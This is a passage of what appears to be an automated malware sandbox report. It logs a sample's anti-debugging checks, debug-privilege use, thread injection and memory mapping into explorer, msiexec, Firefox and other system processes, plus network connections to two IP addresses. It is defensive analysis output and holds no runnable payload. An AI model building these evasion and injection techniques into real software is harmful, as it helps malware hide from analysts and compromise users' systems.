Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Program Files\Rutf\IconCache-ze.exe Thread information set: HideFromDebugger
Source: C:\Program Files\Rutf\IconCache-ze.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process queried: DebugPort
Source: C:\Windows\System32\msiexec.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 5_2_1EC31EFF rdtsc 5_2_1EC31EFF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E2C69 mov eax, dword ptr fs:[00000030h] 0_2_003E2C69
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E849C mov eax, dword ptr fs:[00000030h] 0_2_003E849C
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E8CCF mov eax, dword ptr fs:[00000030h] 0_2_003E8CCF
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E9B19 mov eax, dword ptr fs:[00000030h] 0_2_003E9B19
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E4367 mov eax, dword ptr fs:[00000030h] 0_2_003E4367
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E2B48 mov eax, dword ptr fs:[00000030h] 0_2_003E2B48
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E1DA7 mov eax, dword ptr fs:[00000030h] 0_2_003E1DA7
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E97C0 mov eax, dword ptr fs:[00000030h] 0_2_003E97C0
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00152C69 mov eax, dword ptr fs:[00000030h] 1_2_00152C69
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_0015849C mov eax, dword ptr fs:[00000030h] 1_2_0015849C
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00158CCF mov eax, dword ptr fs:[00000030h] 1_2_00158CCF
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00159B19 mov eax, dword ptr fs:[00000030h] 1_2_00159B19
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00152B48 mov eax, dword ptr fs:[00000030h] 1_2_00152B48
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00154367 mov eax, dword ptr fs:[00000030h] 1_2_00154367
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_00151DA7 mov eax, dword ptr fs:[00000030h] 1_2_00151DA7
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 1_2_001597C0 mov eax, dword ptr fs:[00000030h] 1_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E2C69 mov eax, dword ptr fs:[00000030h] 2_2_003E2C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E849C mov eax, dword ptr fs:[00000030h] 2_2_003E849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E8CCF mov eax, dword ptr fs:[00000030h] 2_2_003E8CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E9B19 mov eax, dword ptr fs:[00000030h] 2_2_003E9B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E4367 mov eax, dword ptr fs:[00000030h] 2_2_003E4367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E2B48 mov eax, dword ptr fs:[00000030h] 2_2_003E2B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E1DA7 mov eax, dword ptr fs:[00000030h] 2_2_003E1DA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 2_2_003E97C0 mov eax, dword ptr fs:[00000030h] 2_2_003E97C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00192C69 mov eax, dword ptr fs:[00000030h] 4_2_00192C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_0019849C mov eax, dword ptr fs:[00000030h] 4_2_0019849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00198CCF mov eax, dword ptr fs:[00000030h] 4_2_00198CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00199B19 mov eax, dword ptr fs:[00000030h] 4_2_00199B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00192B48 mov eax, dword ptr fs:[00000030h] 4_2_00192B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00194367 mov eax, dword ptr fs:[00000030h] 4_2_00194367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_00191DA7 mov eax, dword ptr fs:[00000030h] 4_2_00191DA7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 4_2_001997C0 mov eax, dword ptr fs:[00000030h] 4_2_001997C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_1EF66B80 mov eax, dword ptr fs:[00000030h] 7_2_1EF66B80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00152C69 mov eax, dword ptr fs:[00000030h] 7_2_00152C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00154367 mov eax, dword ptr fs:[00000030h] 7_2_00154367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_0015849C mov eax, dword ptr fs:[00000030h] 7_2_0015849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00152B48 mov eax, dword ptr fs:[00000030h] 7_2_00152B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00158CCF mov eax, dword ptr fs:[00000030h] 7_2_00158CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_001597C0 mov eax, dword ptr fs:[00000030h] 7_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00159B19 mov eax, dword ptr fs:[00000030h] 7_2_00159B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 7_2_00151DA7 mov eax, dword ptr fs:[00000030h] 7_2_00151DA7
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00242C69 mov eax, dword ptr fs:[00000030h] 14_2_00242C69
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_0024849C mov eax, dword ptr fs:[00000030h] 14_2_0024849C
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00248CCF mov eax, dword ptr fs:[00000030h] 14_2_00248CCF
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00249B19 mov eax, dword ptr fs:[00000030h] 14_2_00249B19
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00244367 mov eax, dword ptr fs:[00000030h] 14_2_00244367
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00242B48 mov eax, dword ptr fs:[00000030h] 14_2_00242B48
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_00241DA7 mov eax, dword ptr fs:[00000030h] 14_2_00241DA7
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 14_2_002497C0 mov eax, dword ptr fs:[00000030h] 14_2_002497C0
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00152C69 mov eax, dword ptr fs:[00000030h] 15_2_00152C69
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_0015849C mov eax, dword ptr fs:[00000030h] 15_2_0015849C
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00158CCF mov eax, dword ptr fs:[00000030h] 15_2_00158CCF
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00159B19 mov eax, dword ptr fs:[00000030h] 15_2_00159B19
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00152B48 mov eax, dword ptr fs:[00000030h] 15_2_00152B48
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00154367 mov eax, dword ptr fs:[00000030h] 15_2_00154367
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_00151DA7 mov eax, dword ptr fs:[00000030h] 15_2_00151DA7
Source: C:\Program Files\Rutf\IconCache-ze.exe Code function: 15_2_001597C0 mov eax, dword ptr fs:[00000030h] 15_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_1ED76B80 mov eax, dword ptr fs:[00000030h] 17_2_1ED76B80
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00152C69 mov eax, dword ptr fs:[00000030h] 17_2_00152C69
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00154367 mov eax, dword ptr fs:[00000030h] 17_2_00154367
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_0015849C mov eax, dword ptr fs:[00000030h] 17_2_0015849C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00152B48 mov eax, dword ptr fs:[00000030h] 17_2_00152B48
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00158CCF mov eax, dword ptr fs:[00000030h] 17_2_00158CCF
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_001597C0 mov eax, dword ptr fs:[00000030h] 17_2_001597C0
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00159B19 mov eax, dword ptr fs:[00000030h] 17_2_00159B19
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 17_2_00151DA7 mov eax, dword ptr fs:[00000030h] 17_2_00151DA7
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process token adjusted: Debug
Source: C:\Windows\System32\msiexec.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.253.89.155 80
Source: C:\Windows\explorer.exe Network Connect: 35.208.146.4 80
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\msiexec.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\msiexec.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and write
Source: C:\Windows\System32\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\System32\msiexec.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\msiexec.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\System32\msiexec.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\System32\msiexec.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\msdt.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Section loaded: unknown target: C:\Windows\System32\msdt.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\___ __ ___.exe Thread register set: target process: 304
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread register set: target process: 1508
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread register set: target process: 2212
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread register set: target process: 1216
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread register set: target process: 1216
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread register set: target process: 1216
Source: C:\Windows\System32\msiexec.exe Thread register set: target process: 1216